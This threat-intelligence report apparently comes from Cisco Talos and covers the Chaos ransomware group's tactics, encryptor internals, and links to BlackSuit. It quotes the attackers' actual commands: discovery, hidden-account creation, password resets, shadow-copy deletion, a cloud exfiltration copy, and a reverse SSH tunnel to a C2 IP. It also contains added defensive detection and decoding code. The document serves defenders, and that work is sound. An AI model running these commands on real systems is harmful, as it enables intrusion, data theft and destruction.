Unmasking the new Chaos RaaS group attacks

  • Cisco Talos Incident Response (Talos IR) recently observed attacks by Chaos, a relatively new ransomware-as-a-service (RaaS) group conducting big-game hunting and double extortion attacks.  
  • Chaos RaaS actors initiated low-effort spam flooding, escalating to voice-based social engineering for access, followed by RMM tool abuse for persistent connection and legitimate file-sharing software for data exfiltration. 
  • The ransomware utilizes multi-threaded rapid selective encryption, anti-analysis techniques, and targets both local and network resources, maximizing impact while hindering detection and recovery. 
  • Talos believes the new Chaos ransomware is unrelated to previous Chaos builder-generated variants, as the group uses the same name to create confusion.  
  • Talos assesses with moderate confidence that the new group is likely formed by former members of the BlackSuit (Royal) gang, based on similarities in the ransomware’s encryption methodology, ransom note structure, and the toolset used in the attacks. 

Victimology 

The new Chaos has impacted a wide variety of business verticals and appears to be opportunistic, with no focus on any specific vertical. According to the actor’s data leak site, victims have been predominantly in the U.S., with fewer in the U.K., New Zealand and India. 

Who is Chaos? 

Chaos is a relatively new RaaS group that emerged as early as February 2025. The Chaos group is actively promoting their cross-platform ransomware software in the dark web Russian-speaking cybercriminal forum Ransom Anon Market Place (RAMP) and is seeking collaboration with affiliates. They emphasize that the new Chaos ransomware software is compatible with Windows, ESXi, Linux and NAS systems, with features such as individual file encryption keys, rapid encryption speeds and network resource scanning — all with a strong emphasis on high-speed encryption and robust security measures.  

Additionally, the group provides an automated panel for managing targets and communications, which requires a paid entry fee that is refundable upon the first case of payment. They have also clearly stated in their dark web forum post that they explicitly avoid collaborating with BRICS/CIS countries, hospitals and government entities. 

Furthermore, the group is offering an onion URL for potential affiliates to register for an account with the Chaos group and has provided a support email address at “win88@thesecure[.]biz”. 

Talos IR observed that the group has been launching big-game hunting and double extortion attacks. Like other operators in the double extortion space, Chaos also runs a data leak site to disclose the stolen data of victims who fail to meet their ransom demands. 

Figure 2. Chaos data leak site homepage.

Chaos encrypts the victim’s environment, uses “.chaos” as the file extension for the encrypted files, and drops the ransom note “readme.chaos[.]txt”. In the ransom note, the actor claims that they attempted to perform security testing in the victim’s environment and were successful in compromising it. They also threaten the victims with the disclosure of their stolen confidential data if they fail to pay the ransom amount. The actor does not leave an initial ransom demand or payment instructions in their ransom note but provides instructions to contact them using an onion URL specific to each victim. 

Figure 3. Chaos ransom note.

Talos IR observed that the actor demanded a ransom amount of $300K through the victim communication channel and offered two options. If the victim pays the amount, the actor will provide a decryptor application for targeted environments, along with a detailed report of the penetration test conducted on the victim’s environment. They also assure the victim that the stolen data will not be disclosed and will be permanently deleted, ensuring that they will not conduct repeated attacks. 

If the victim fails to pay the ransom, the actor threatens to disclose their stolen data and conduct a distributed denial-of-service (DDoS) attack on all the victim’s internet-facing services, as well as spread the news of their data breach to competitors and clients. 

Figure 4. Chaos actor demand. 

The Chaos ransomware actor is a recent and concerning addition to the evolving threat landscape, having shown minimal historical activity before the current wave of intrusions. Importantly, this new Chaos ransomware gang is not connected to the variants produced by the Chaos ransomware builder tool or its developers. To hide their identity, these threat actors have exploited the confusion within the security community regarding the name “Chaos” and its various variants and associated builder tools. This deliberate obfuscation complicates the identification and mitigation of risks posed by this emerging threat. 

Figure 5. Chaos RaaS diamond model.

Recent attack methodologies and notable TTPs 

During our investigation of Chaos ransomware attacks, the Talos IR team observed several significant, noteworthy TTPs. 

Initial access 

T1078 – Valid Accounts 

T1598.004 – Phishing for Information: Voice Phishing (Vishing) 

The actor has gained initial access to the victim through social engineering, utilizing phishing and voice phishing techniques. The victim was initially flooded with spam emails, encouraging them to contact the threat actor via a telephone call. When the victim reaches out, the threat actor, impersonating IT security representatives, advises the victim to launch a built-in remote assistance tool on their Windows machine, specifically Microsoft Quick Assist, and instructs them to connect to the actor’s session. 

Discovery  

T1016 – System Network Configuration Discovery 

T1482 – Domain Trust Discovery 

T1033 – System Owner/User Discovery 

T1057 – Process Discovery 

T1018 – Remote System Discovery 

T1135 – Network Share Discovery 

Talos IR observed multiple commands executed by the actor in the victim environment to carry out post-compromise discovery and reconnaissance. The actor collects network configuration details, information about the domain controller and trust relationships, logged-in user data and running processes, and performs reverse DNS lookups. 

ipconfig /all  
nltest /dclist  
nltest.exe /domain_trusts  
nltest.exe /dclist:$domain  
nslookup $Internal_IP_address 
net view $Internal_IP /all 
quser.exe  
tasklist.exe   

Execution 

T1059.001 – PowerShell 

T1059 – Command and Scripting Interpreter 

T1047 – Windows Management Instrumentation  

The actor executed scripts and commands to perform the following actions on the victim machine, preparing the environment to download and execute malicious files and connect to the actor’s command and control (C2) server. 

  • The threat actor executes the following PowerShell command to set the working environment on the victim machine. 

powershell.exe -noexit -command Set-Location -literalPath 'C:\Users\$user\Desktop' 

  • The actor executes the following command on all compromised machines in the victim’s network to set Windows Delivery Optimization so that files larger than 50 MB can be downloaded from a local server on port 8005, ensuring large files are fetched efficiently from peer servers.  

PowerShell.exe -Nologo -Noninteractive -NoProfile -ExecutionPolicy Bypass; Get-DeliveryOptimizationStatus | where-object {($_.SourceUrl -CLike 'hxxp[://]localhost[:]8005*') -AND (($_.FileSize -ge '52428800') -or ($_.BytesFromPeers -ne '0') -or (($_.BytesFromCacheServer -ne '0') -and ($_.BytesFromCacheServer -ne $null)))} | select-object -Property BytesFromHttp, FileId, BytesFromPeers, Status, BytesFromCacheServer, SourceURL | ConvertTo-Xml -as string -NoTypeInformation   

  • We also observed that the actor used the “atexec” tool from the Impacket toolkit for remote command execution.  

Persistence  

T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder   

T1133 – External Remote Services 

Talos IR observed that the actor installed RMM tools such as AnyDesk, ScreenConnect, OptiTune, Syncro RMM and Splashtop Streamer on compromised machines to establish a persistent connection to the victim network. 

The actor executed a command to modify a Windows registry setting that hides a user account from the Windows login screen. With this setting in place the account still exists and can be used to log in over Remote Desktop Protocol (RDP) or via runas, but its username is not displayed on the Welcome or login screen.  

cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v $user_account /t REG_DWORD /d 0 /f   

To secure continuous access to the victim machines, the actor also uses the net[.]exe utility to reset the passwords of the enumerated domain user accounts in the victim network. 

net[.]exe user $user_name $password /dom  

Credential access and privilege escalation 

T1555 – Credentials from Password Stores 

Talos IR observed that the threat actor executed an “ldapsearch” command remotely on the victim machine through the reverse SSH tunnel and dumped user details from Active Directory to a text file. The actor is likely attempting to steal the credentials of privileged accounts in the victim’s Active Directory using the Kerberoasting technique, thereby gaining elevated privileges in the victim’s environment.  

Defense evasion 

T1036.005 – Masquerading: Match Legitimate Name or Location  

T1027 – Obfuscated Files or Information  

T1562.001 – Impair Defenses: Disable or Modify Tools  

Talos IR observed that the actor deletes the PowerShell event logs on the victim machine to evade security controls. The actor also attempted to uninstall a security or multifactor authentication application on the victim machine using the Windows Management Instrumentation command-line utility (WMIC).  

cmd.EXE /c wmic product where name=$MFA_application for Windows Logon x64 call uninstall /nointeractive 

Lateral movement  

T1021.001 – Remote Services: Remote Desktop Protocol (RDP)   

T1021.004 – Remote Services: SSH  

T1021.002 – SMB/Windows Admin Shares   

Talos IR found that the actor leveraged an RDP client and Impacket, facilitating the command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI) to move laterally in the victim’s network.  

mstsc.exe /v:$remote_machine_hostname 
wmic /node:$host process call create "C:\Users\encryptor[.]exe /lkey:"$32-bytekey" /encrypt_step:40 /work_mode:local_network" 

Collection and exfiltration  

T1005 – Data from Local System 

T1567.002 – Exfiltration Over Web Service 

T1036.004 – Masquerading: Masquerade Task or Service 

T1059.003 – Command and Scripting Interpreter: Windows Command Shell 

During our investigation, we found that the actor used GoodSync, a legitimate and widely used file synchronization and backup software, in the attack to extract the data from the victim’s machine. 

The actor has executed a command using a file synchronization or cloud upload tool masquerading as a legitimate Windows executable “wininit[.]exe” to copy data from a network file share to a threat actor-controlled remote cloud storage location.  

The command filters files on the victim machine to include only those files modified within the last year and excludes several file types, possibly to avoid large or sensitive files that may trigger detection, including: Adobe Photoshop documents, 7-Zip compressed archives, Microsoft Outlook files, image and audio files, generic database files, log files, temporary files, Hyper-V virtual hard disk files, Microsoft installer packages, executable files, dynamic-link library files, and disc image files. 

Wininit[.]exe copy --max-age 1y --exclude *{psd,7z,mox,pst,FIT,FIL,MOV,mdb,iso,exe,dll,wav,png,db,log,HEIC,dwg,tmp,vhdx,msi} \\FS01\data cloud1:basket123/data -q --ignore-existing --auto-confirm --multi-thread-streams 25 --transfers 15 --b2-disable-checksum -P 

Command and control 

T1071 – Application Layer Protocol: SSH 

T1219 – Remote Access Software  

T1105 – Ingress Tool Transfer  

The actor uses the Windows OpenSSH client to establish a reverse SSH tunnel from the victim machine to the actor’s C2 server at IP address “45[.]61[.]134[.]36”, using port 443 instead of the default SSH port. The actor also disables SSH host-key verification by pointing the known_hosts file at /dev/null and turning off strict host key checking. The command sets up remote port forwarding, where port 12840 on the remote server is forwarded to port 12840 on the local victim machine. 

C:\WINDOWS\System32\OpenSSH\ssh[.]exe -R :12840 -N userconnectnopass@45[.]61[.]134[.]36 -p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no   

Impact  

T1490 – Inhibit System Recovery   

T1486 – Data Encrypted for Impact 

During the investigation, Talos IR observed evidence of the encryption command being executed in the victim environment. The ransomware performs selective encryption of the targeted files on the victim machines, encrypting only specific portions of each file to speed up the process. It appends the “.chaos” file extension to the encrypted files. 

Chaos Windows encryption command: 

C:\Users\$filename[.]exe /lkey:"32-byte key" /encrypt_step:40 /work_mode:local_network
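As an added example (not Talos code and not a Cisco product rule), the following Python turns the commands quoted in the sections above into process-creation detections a SOC could run over EDR or Sysmon Event ID 1 telemetry. The record layout (host, image path, command line) and every sample record are constructed for illustration. It generalizes the post in two places: the discovery commands are flagged as a per-host burst of distinct utilities rather than one by one, and wininit.exe is flagged by its image path, since the legitimate binary lives only in System32.

```python
"""Process-creation detections for the Chaos intrusion TTPs quoted in this post.

Added example, not Talos code. Input records mimic the fields a Sysmon
Event ID 1 / EDR process event provides: host, image path and command line.
All sample records below are constructed; the regexes are distilled from the
commands quoted in the post.
"""
import re
from collections import defaultdict

# Command-line rules, one regex each, matched case-insensitively.
CMDLINE_RULES = {
    "hidden_logon_account":
        r"\breg(?:\.exe)?\s+add\s+.*specialaccounts\\userlist\b.*/t\s+reg_dword\s+/d\s+0\b",
    "domain_password_reset":            # "net user <name> <password> /dom" (two args = reset)
        r"\bnet(?:\.exe)?\s+user\s+\S+\s+\S+\s+/dom(?:ain)?\b",
    "wmic_product_uninstall":
        r"\bwmic(?:\.exe)?\s+product\s+.*\bcall\s+uninstall\b",
    "reverse_ssh_tunnel":               # -R plus disabled host-key verification
        r"\bssh(?:\.exe)?\b.*\s-R\s.*(?:stricthostkeychecking=no|userknownhostsfile=/dev/null)",
    "remote_process_create_via_wmic":
        r"\bwmic(?:\.exe)?\s+/node:\S+\s+process\s+call\s+create\b",
    "chaos_encryptor_parameters":
        r"/lkey:.*\s/encrypt_step:\d+.*\s/work_mode:(?:local_network|local|network)\b",
    "shadow_copy_deletion":
        r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b",
}
_COMPILED = {name: re.compile(rx, re.I) for name, rx in CMDLINE_RULES.items()}

# Discovery utilities quoted in the post; several from one host is the signal.
DISCOVERY_TOOLS = {
    "ipconfig": r"\bipconfig(?:\.exe)?\s+/all\b",
    "nltest": r"\bnltest(?:\.exe)?\s+/",
    "nslookup": r"\bnslookup(?:\.exe)?\s+\S+",
    "net_view": r"\bnet(?:\.exe)?\s+view\b",
    "quser": r"\bquser(?:\.exe)?\b",
    "tasklist": r"\btasklist(?:\.exe)?\b",
}
_DISCOVERY = {name: re.compile(rx, re.I) for name, rx in DISCOVERY_TOOLS.items()}


def image_masquerade(record):
    """wininit.exe legitimately lives only in System32; anywhere else is a masquerade."""
    path = record["image"].lower().replace("/", "\\")
    return path.endswith("\\wininit.exe") and not path.startswith("c:\\windows\\system32\\")


def classify(record):
    """Return the names of every rule a single process record trips."""
    hits = [name for name, rx in _COMPILED.items() if rx.search(record["cmdline"])]
    if image_masquerade(record):
        hits.append("masquerading_wininit")
    return hits


def scan(records):
    """Map rule name -> indices of matching records (only rules that fired)."""
    out = defaultdict(list)
    for i, rec in enumerate(records):
        for name in classify(rec):
            out[name].append(i)
    return dict(out)


def discovery_burst(records, threshold=4):
    """Hosts that ran at least `threshold` distinct discovery utilities."""
    seen = defaultdict(set)
    for rec in records:
        for name, rx in _DISCOVERY.items():
            if rx.search(rec["cmdline"]):
                seen[rec["host"]].add(name)
    return {h: sorted(t) for h, t in seen.items() if len(t) >= threshold}


def _rec(host, image, cmdline):
    return {"host": host, "image": image, "cmdline": cmdline}


SAMPLE = [  # constructed records, not real telemetry
    _rec("WS01", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
    _rec("WS01", r"C:\Windows\System32\nltest.exe", "nltest.exe /domain_trusts"),
    _rec("WS01", r"C:\Windows\System32\nslookup.exe", "nslookup 10.0.5.12"),
    _rec("WS01", r"C:\Windows\System32\net.exe", "net view 10.0.5.12 /all"),
    _rec("WS01", r"C:\Windows\System32\quser.exe", "quser.exe"),
    _rec("WS01", r"C:\Windows\System32\cmd.exe",
         r"cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist /v svc_backup /t REG_DWORD /d 0 /f"),
    _rec("WS01", r"C:\Windows\System32\net.exe", "net.exe user jdoe Summer2025! /dom"),
    _rec("WS01", r"C:\WINDOWS\System32\OpenSSH\ssh.exe",
         r"C:\WINDOWS\System32\OpenSSH\ssh.exe -R :12840 -N userconnectnopass@45.61.134.36 -p 443 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no"),
    _rec("WS01", r"C:\Users\jdoe\Desktop\wininit.exe",
         r"wininit.exe copy --max-age 1y \\FS01\data cloud1:basket123/data -q --transfers 15 -P"),
    _rec("WS01", r"C:\Windows\System32\cmd.exe",
         'cmd.EXE /c wmic product where name="Example MFA Agent for Windows Logon x64" call uninstall /nointeractive'),
    _rec("WS01", r"C:\Windows\System32\wbem\WMIC.exe",
         r'wmic /node:FS01 process call create "C:\Users\encryptor.exe /lkey:<32-byte-key> /encrypt_step:40 /work_mode:local_network"'),
    _rec("FS01", r"C:\Windows\System32\cmd.exe", "cmd.exe /c vssadmin delete shadows /all"),
    _rec("WS02", r"C:\Windows\System32\wininit.exe", "wininit.exe"),          # legitimate
    _rec("WS02", r"C:\Windows\System32\net.exe", "net user jdoe /domain"),   # query, not a reset
]

if __name__ == "__main__":
    for name, idx in sorted(scan(SAMPLE).items()):
        print(f"{name}: records {idx}")
    print("discovery burst:", discovery_burst(SAMPLE))
```

The two benign records at the end are there deliberately: a query of the form `net user <name> /domain` must not fire the password-reset rule, and the real wininit.exe under System32 must not fire the masquerade rule, so keep such negative cases in any rule set you adapt from this.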

Chaos ransomware encryptor analysis 

The new Chaos ransomware represents an encryptor that possesses the ability to encrypt files not only across local resources but also throughout network resources. It employs anti-analysis techniques specifically designed to evade detection, alongside a multi-threaded operation that facilitates rapid encryption. This design is intended for maximum impact on targeted organizations, all while ensuring operational stealth and implementing recovery prevention capabilities.  

Talos found a few samples of the Windows version of the Chaos ransomware encryptor. They are 32-bit executables compiled in February, March and May 2025, indicating that the Chaos group is actively operating. 

In this section we explain the functionalities of the new Chaos ransomware encryptor used to target Windows machines. 

Anti-analysis techniques 

The Chaos ransomware implements a multi-layered anti-analysis technique that systematically identifies and evades a range of debugging tools, virtual machine environments, automated sandboxes and security analysis platforms through window enumeration, process monitoring and timing analysis techniques: 

  • The ransomware detects debugging environments by enumerating window classes and matching window titles against patterns for debugger applications. 
  • It detects virtual machine and sandbox environments using both process enumeration and window class detection.  
  • It detects various security and monitoring tools used for threat and malware analysis using process enumeration. 

All of these checks compare hashes against precomputed signatures rather than storing plaintext tool names that static analysis could spot, and the malware terminates immediately when it detects any analysis environment. 

Configuration and initialization 

Following a successful evasion, the ransomware parses command-line configuration parameters provided by the operator during the attack. A sample encryption command is shown below: 

Encryptor[.]exe /lkey:"32-byte key" /encrypt_step:$0-100 /work_mode:$mode /ignorar_arquivos_grandes 

  • A 32-byte encryption key (‘lkey’) 
  • Target directory path (‘path’) 
  • Selective encryption percentage (‘encrypt_step’ defaulting to 30%) 
  • Operation mode (‘work_mode’ supporting local, network, or local_network combined operations) 
  • Large file handling options (‘ignorar_arquivos_grandes’) 

Figure 6. Snippet of the function parsing the encryption configuration command-line parameters. 

Simultaneously, the ransomware executes an obfuscated system command that deletes volume shadow copies to prevent file recovery through Windows System Restore. Each character of the command is stored in the binary as a byte value followed by 0x0E, and the command is decoded at runtime using the custom routine shown in Figure 7. 

The decoded volume shadow copy deletion command is shown below: 

cmd.exe /c vssadmin to delete shadows /all 

Figure 7. Snippet of the function to decrypt and execute the volume shadow copy deletion command. 

Encryption algorithm and process  

The ransomware employs hybrid cryptographic techniques utilizing Elliptic Curve Diffie-Hellman (ECDH) with Curve25519 for asymmetric operations and AES-256 for symmetric file encryption.   

In each execution, the ransomware generates a unique ECC key pair using Windows CNG (Cryptography Next Generation), keeping the private key in memory and exporting the public key in ECCPUBLICBLOB format. File-specific encryption keys are derived through ECDH key agreement combined with the operator-controlled 32-byte master key and a further key generated for each encryption iteration, so that each file receives a unique encryption key.  

Figure 8. Function initializes the cryptographic provider.

Chaos ransomware supports three encryption modes: local, network and local_network (both).  

In local encryption mode, the ransomware is configured to encrypt only the targeted set of files on the infected machine. It initiates its attempts by seeking normal access, and in the event of a failure to gain standard access, it elevates its privileges by modifying the security descriptors, followed by executing token impersonation. It accomplishes this by enumerating system processes such as svchost.exe and explorer.exe, subsequently opening process tokens. Through this method, the ransomware impersonates high-privilege security contexts, effectively bypassing file access restrictions on victim machines. 

Figure 9. Privilege escalation function of Chaos ransomware.

The ransomware performs recursive directory traversal while skipping system-critical folders and files, which keeps the system bootable while targeting user-created documents. Folders excluded from encryption by Chaos ransomware on Windows machines include: 

  • System folders: Windows, boot, system volume information, perflogs 
  • Browser data: Mozilla, google, tor browser 
  • Application directories: Appdata, msocache, intel 
  • Maintenance folders: $recycle.bin, windows.old, $windows.~ws, $windows.~bt  

Files excluded for encryption by Chaos ransomware on Windows Machine include: 

  • Boot files: bootsect.bak, boot.ini, ntldr, bootfont.bin 
  • System files: ntuser.dat, autorun.inf, desktop.ini, ntuser.ini, ntuser.dat.log 
  • Diagnostic files: diagpkg, diagcab, diagcfg 
  • Theme files: msstyles, themepack, deskthemepack, theme 
  • Other files: Icns, lock, nomedia and files without file extensions 
  • Previously encrypted files: *.chaos extension  

In network encryption mode, the ransomware performs network discovery by enumerating local network interfaces, identifying private IP address ranges and generating target lists for all hosts within the discovered subnets. It then connects to the discovered machines over SMB and enumerates and queues the available network shares for encryption, excluding the administrative shares (ADMIN$, C$ and IPC$). This technique may allow the ransomware to propagate across entire corporate infrastructures, encrypting shared drives, network-attached storage and distributed file systems, significantly amplifying the attack’s impact. 

Chaos ransomware performs selective encryption based on the “/encrypt_step” command-line parameter specified by the operator during the attack. It calculates specific file offsets to encrypt, optimizing encryption speed while still rendering the file unusable. It appends 60 bytes of metadata to every encrypted file, containing the public key in ECCPUBLICBLOB format and other encryption parameters such as the algorithm identifier and key data size, and renames the file with the “.chaos” extension. 

Figure 10. Snippet of the encryption function initializing “.chaos” file extensions. 
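The selective encryption described above leaves readable plaintext between the encrypted stretches of a file, which matters during recovery triage: an analyst wants to know which ranges of a file were touched before deciding whether partial carving is worthwhile. As an added example, not Talos code, the following Python applies a sliding-window Shannon entropy scan to locate high-entropy ranges in a file. The sample “document” is constructed in the code (repeated text with one pseudo-random block standing in for ciphertext), and the window size and threshold are assumptions to tune per file type (compressed formats such as DOCX or JPEG are high-entropy even when intact, so compare against a known-good sample of the same type).

```python
"""Sliding-window entropy triage for a partially encrypted file.

Added example, not Talos code. The sample file below is constructed:
readable text with one deterministic pseudo-random block in the middle
that stands in for the encrypted portion. Window and threshold are
assumptions to tune per file type.
"""
import hashlib
import math


def shannon_entropy(chunk: bytes) -> float:
    """Bits per byte: 0.0 for a constant chunk, 8.0 for a uniform one."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    total = len(chunk)
    return -sum(c / total * math.log2(c / total) for c in counts if c)


def high_entropy_regions(data: bytes, window: int = 512, threshold: float = 7.0):
    """Return [(start, end)] byte ranges made of consecutive windows above `threshold`."""
    regions, start = [], None
    for off in range(0, len(data), window):
        ent = shannon_entropy(data[off:off + window])
        if ent >= threshold and start is None:
            start = off                      # entering a ciphertext-like stretch
        elif ent < threshold and start is not None:
            regions.append((start, off))     # leaving it
            start = None
    if start is not None:
        regions.append((start, len(data)))
    return regions


def encrypted_fraction(data: bytes, **kw) -> float:
    """Share of the file covered by high-entropy regions (0.0 .. 1.0)."""
    if not data:
        return 0.0
    return sum(end - start for start, end in high_entropy_regions(data, **kw)) / len(data)


def pseudo_random(n: int, seed: bytes = b"constructed-sample") -> bytes:
    """Deterministic stand-in for ciphertext so the example is reproducible offline."""
    out, counter = bytearray(), 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


# Constructed 8 KiB "document": 4 KiB text, 2 KiB ciphertext-like block, 2 KiB text.
_TEXT = b"Quarterly report: revenue, costs and headcount by region.\n" * 200
SAMPLE_FILE = _TEXT[:4096] + pseudo_random(2048) + _TEXT[:2048]

if __name__ == "__main__":
    for start, end in high_entropy_regions(SAMPLE_FILE):
        print(f"high-entropy range: {start}-{end} ({end - start} bytes)")
    print(f"estimated encrypted fraction: {encrypted_fraction(SAMPLE_FILE):.2f}")
```

Run it against a real `.chaos` file with `open(path, "rb").read()` in place of `SAMPLE_FILE`; the reported fraction is a rough check on the operator's `/encrypt_step` value, and the plaintext ranges are what a carving tool can still recover.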

Ransom note deployment and clean-up 

The ransomware decrypts its ransom note message using a custom XOR cipher with a 25-byte key. It allocates 1310 bytes (0x51E) in memory for the decrypted note and employs complex offset calculations to obfuscate the simple XOR operation. The encrypted data is decrypted in 5-byte chunks using a distinct XOR key pattern drawn from the 25-byte key. The decrypted ransom message is written to the file “readme[.]chaos[.]txt”.  

The 25-byte key used for ransom note XOR decryption is: 

e2 80 9a d0 a3 28 65 d1 97 d0 b9 d0 94 09 3e d1 85 d1 86 1d 01 e2 80 b9 e2 

Figure 11. Snippet of the ransom note decryption function. 
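The two string-obfuscation schemes described above (an embedded command stored as byte/0x0E pairs, and a ransom note XOR-encoded with the 25-byte key) are the kind an analyst reimplements to validate a sample. The following Python, an added example and not Talos code, decodes the separator layout and, because the post gives the key but not the exact 5-byte chunk schedule, assumes a plain repeating-key XOR and scores each of the 25 key rotations by printable ratio so the analyst can see whether that assumption holds against a real sample. The encoded blobs are constructed in the code, not bytes from the binary.

```python
"""Decoding helpers for the two obfuscation schemes the post describes in the
Chaos Windows encryptor. Added example, not Talos code.

1. An embedded command stored as <byte, 0x0E> pairs.
2. A ransom note XOR-encoded with a 25-byte key. The post gives the key but
   not the exact chunk/offset schedule, so this assumes a plain repeating-key
   XOR and tests every key rotation; a low best score on a real sample means
   the schedule differs and needs to be recovered from the decryption routine.
"""

# 25-byte key quoted in the post.
NOTE_XOR_KEY = bytes.fromhex("e2809ad0a32865d197d0b9d094093ed185d1861d01e280b9e2")

SEPARATOR = 0x0E


def decode_separated(blob: bytes, sep: int = SEPARATOR) -> str:
    """Recover a command stored as <char, sep> pairs; reject any other layout."""
    if len(blob) % 2 or any(blob[i] != sep for i in range(1, len(blob), 2)):
        raise ValueError("blob is not a <byte, 0x0E> sequence")
    return blob[0::2].decode("ascii")


def encode_separated(text: str, sep: int = SEPARATOR) -> bytes:
    """Inverse of decode_separated; used only to build the constructed sample."""
    return b"".join(bytes([b, sep]) for b in text.encode("ascii"))


def xor_with_key(blob: bytes, key: bytes, rotation: int = 0) -> bytes:
    """Repeating-key XOR with the key stream started at index `rotation`."""
    n = len(key)
    return bytes(b ^ key[(i + rotation) % n] for i, b in enumerate(blob))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or whitespace (readability score)."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b <= 0x7E or b in (0x09, 0x0A, 0x0D))
    return ok / len(data)


def best_rotation(blob: bytes, key: bytes):
    """Try every key rotation; return (rotation, decoded) with the most readable output.

    Ties resolve to the lowest rotation. Most key bytes have the high bit set,
    so a wrong rotation produces many non-ASCII bytes and scores well below 1.0.
    """
    scored = [(printable_ratio(xor_with_key(blob, key, r)), -r, r) for r in range(len(key))]
    _, _, r = max(scored)
    return r, xor_with_key(blob, key, r)


# Constructed samples (not bytes from the real binary).
SAMPLE_SEPARATED = encode_separated("cmd.exe /c vssadmin to delete shadows /all")
SAMPLE_NOTE_TEXT = ("Hello. We performed a security test on your network and "
                    "encrypted your files. Contact us via the onion address in this note.")
SAMPLE_NOTE_BLOB = xor_with_key(SAMPLE_NOTE_TEXT.encode("ascii"), NOTE_XOR_KEY, rotation=7)

if __name__ == "__main__":
    print("separated command:", decode_separated(SAMPLE_SEPARATED))
    rot, text = best_rotation(SAMPLE_NOTE_BLOB, NOTE_XOR_KEY)
    print(f"best rotation {rot} (score {printable_ratio(text):.2f}):", text.decode("ascii"))
```

On a real sample, feed `best_rotation` the raw encrypted note bytes carved from the binary; if no rotation scores close to 1.0, the 5-byte chunk schedule the post mentions is in play and the offset logic in Figure 11 has to be mirrored rather than assumed.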

After completing encryption, the ransomware runs its cleanup routine: terminating worker threads, freeing memory buffers, releasing cryptographic resources, closing network connections and file handles, and then exiting the process cleanly. 

Chaos TTPs overlap with BlackSuit (Royal) ransomware  

Talos assesses with moderate confidence that the new Chaos ransomware group is either a rebranding of the BlackSuit (Royal) ransomware or operated by some of its former members. This assessment is based on the similarities in TTPs, including encryption commands, the theme and structure of the ransom note, and the use of LOLbins and RMM tools in their attacks. 

Talos IR observed that the Chaos operator utilizes configuration parameters for the encryption process during the attack, including “lkey”, “encrypt_step”, and “work_mode”. This configuration enables the ransomware to selectively encrypt both local and network resources within the victim’s environment. 

Enc.exe /lkey:"<32-byte>" /encrypt_step:40 /work_mode:local_network 

A similar encryption technique was seen in earlier Royal and BlackSuit ransomware attacks, according to external security reporting. Although the names of the encryption parameters differ, the actions they control are the same. 

The table below shows the similarities between the encryption parameters of the new Chaos and BlackSuit (Royal) ransomware. 

Chaos           BlackSuit (Royal)   Purpose 
/lkey           -id                 32-byte key 
/encrypt_step   -ep                 Defines the portion / percentage of each targeted file to be encrypted. 
/kill_vms       stopvm              Stops virtual machines running on the target system. 

The Chaos ransomware ransom note shares a similar theme and structure to Royal/BlackSuit, including a greeting, references to a security test, double extortion messaging, assurances of data confidentiality and an onion URL for contact. 

Figure 12. Ransom note of BlackSuit ransomware. 

Figure 13. Ransom note of Royal ransomware. 

Additionally, Talos observed that the techniques employed in the Chaos ransomware attacks overlap with the BlackSuit ransomware TTPs reported in CISA’s StopRansomware advisory for BlackSuit (Royal) ransomware. 

Coverage  

Ways our customers can detect and block this threat are listed below.  

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.  

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless, transparent and secure access to the internet, cloud services or private applications no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.  

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.   

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.   

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.   

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for the threats are: 

  • Snort2: 65125, 65126 
  • Snort3: 301273 

ClamAV detections are also available for this threat: 

  • Win.Ransomware.Chaos-10045485-0 

Indicators of compromise (IOCs) 

IOCs for this threat can be found in our GitHub repository here
